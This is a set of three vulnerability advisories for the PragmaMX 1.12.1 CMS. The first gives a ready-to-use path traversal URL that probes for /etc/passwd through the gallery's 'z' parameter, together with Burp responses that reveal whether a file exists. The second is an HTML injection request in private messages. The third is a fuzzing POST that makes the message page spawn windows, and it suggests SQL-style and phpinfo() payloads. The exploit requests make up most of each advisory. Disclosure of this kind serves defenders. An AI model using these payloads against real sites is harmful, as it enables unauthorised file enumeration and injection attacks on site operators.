[EN] PragmaMX 1.12.1 - remote file enumeration

# TITLE ....... # PragmaMx 1.12.1 remote file enumeration ......................................... #
# DATE ........ # 15.03.2012 ...................................................................... #
# AUTOHR ...... # http://hauntit.blogspot.com ..................................................... #
# SOFT LINK ... # http://pragmamx.org ............................................................. #
# VERSION ..... # 1.12.1 .......................................................................... #
# TESTED ON ... # LAMP ............................................................................ #
# ................................................................................................. #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#..........................................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

#..........................................................#
# 2. What is the type of vulnerability?

This is "remote file enumeration" bug.
After some fuzzing tests I found nice behavior of new PragmaMX.

The "correct functionality" is z-parameter is handling image filename.
I've done something else. I pointed 'filename' to 'other file in file system',
for example /etc/passwd.


#..........................................................#
# 3. Where is bug :)

Vulnerable is "z" parameter.
If we send GET like this:

http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image&z=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&width=295&height=420

our response should looke like:
...cut.from.Burp...
(...)
 <head>
    <title>/etc/passwd</title>
  </head>
  <body style="margin: 0; padding: 0;">
    <img src="../../../../../../../../../../../../etc/passwd" width="295" height="420" alt="/etc/passwd" />  </body>
</html>
...cut.from.Burp...

This will be an answer "if remote file is there". By "there" I mean localization-of-file-You-point.

If there won't be a file You choosed, answer will be something like:
(GET:
http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image&z=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswdlalala.txt&width=295&height=420
)

...cut.from.Burp...
 <head>
    <title></title>
  </head>
  <body style="margin: 0; padding: 0;">
    <img src="../../../../../../../../../../../../etc/passwdlalala.txt" width="295" height="420" alt="" />  </body>
</html>
...cut.from.Burp...

So the difference is in "alt" tag in answer.
If in remote server we can 'find a file x', then this 'x' name will be presented in HTTP response.
If in remote localization we can not find a file (x), then output (alt tag) should be blank.

This vulnerability can be used to:
a) check for some other lfi/rfi-based attacks
b) write a bruteforcer to determine OS/PHP-version, get paths of configs, etc...


And here will be more:
./modules/My_eGallery/image.php:19:$img = (isset($_GET['z']) && is_string($_GET['z'])) ? $_GET['z'] : '';


#..........................................................#
# 4. More...

- http://www.pragmamx.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#..........................................................#
# 5. Mail me, I'm still looking for a new projects... ;)

#............................................#
# Best regards
#

[EN] PragmaMX 1.12.1 - simple "html injection"

# TITLE ....... # PragmaMx 1.12.1 Basic HTML Injection (for users logged-in) ............ #
# DATE ........ # 17.03.2012 ............................................................ #
# AUTOHR ...... # http://hauntit.blogspot.com ........................................... #
# SOFT LINK ... # http://www.pragmamx.org ............................................... #
# VERSION ..... # 1.12.1 ................................................................ #
# TESTED ON ... # LAMP .................................................................. #
# ....................................................................................... #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

#............................................#
# 2. What is the type of vulnerability?
I called it 'basic html injection' because we can send 'HTML' via this form (of logged-in user).
We can not send 'all HTML tags' but only defined in webapplication.
TO know how we can do XSS or phishing, we can try to 'bruteforce' all HTML tags
(in this scenario tags should be similar to tags we (user) can add in posts.

#............................................#
# 3. Where is bug :)
...cut from Burp...
POST /www/pragmamx.1.12.1/html/modules.php?name=Private_Messages HTTP/1.1
Host: localhost
(...)

subject=aaaaa&message=aaaaaaaaaaaaaaaaa&name=Private_Messages&file=buddy&to_userid=3&op=send&to=test;)<br>test;)<br>test;)<br>test;)<br>&x=59&y=22
...cut from Burp...

#............................................#
# 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#............................................#
# Best regards
#

[EN] PragmaMx 1.12.1 - 'bomb' for logged-in users (in Private_Messages)

In latest PragmaMX I found interesting behavior. Described below:

# TITLE ....... # PragmaMx 1.12.1 - 'bomb' for logged-in users (in Private_Messages) ........ #
# DATE ........ # 18.03.2012 ................................................................................... #
# AUTOHR ...... # http://hauntit.blogspot.com .................................................................. #
# SOFT LINK ... # http://www.pragmamx.org ...................................................................... #
# VERSION ..... # 1.12.1 ....................................................................................... #
# TESTED ON ... # LAMP ......................................................................................... #
# .............................................................................................................. #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

#............................................#
# 2. What is the type of vulnerability?
When I was fuzzing this application I found very interesting thing.
Look at traffic from Burp at (3).

#............................................#
# 3. Where is bug :)

...cut from Burp...
POST /www/lastz/pragmamx.1.12.1/html/modules.php?name=Private_Messages HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
Referer: http://localhost/www/lastz/pragmamx.1.12.1/html/modules.php?name=Private_Messages&file=buddy&op=compose&to=tester
Cookie: mxlalala=lalala; tab_ya_edituser=1; PHPSESSID=PHPSESSID
Content-Type: application/x-www-form-urlencoded
Content-Length: 177
Connection: close

subject=aaaaa&message=aaaaaaaaaaaaaaaaa&name=Private_Messages&file=buddy&to_userid=-999999999999999&op=-999999999999999&to=-999999999999999&x=-999999999999999&y=-999999999999999
...cut from Burp...

What I saw at this stage You can check at my blog (4).
Description should be: after I build this payload (-999...) and send it to PragmaMx Via Burp,
response status was 200 (OK). So I copied url string and 'send it to browser'.
Page started to create new windows in messages (of other fuzzing tests).

'-999...' it's not 'only payload' to see this.
You can try many more, like: 23 or 1, 1 or 1=1, phpinfo(), etc.

Try it ;)

#............................................#
# 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#............................................#
# Best regards
#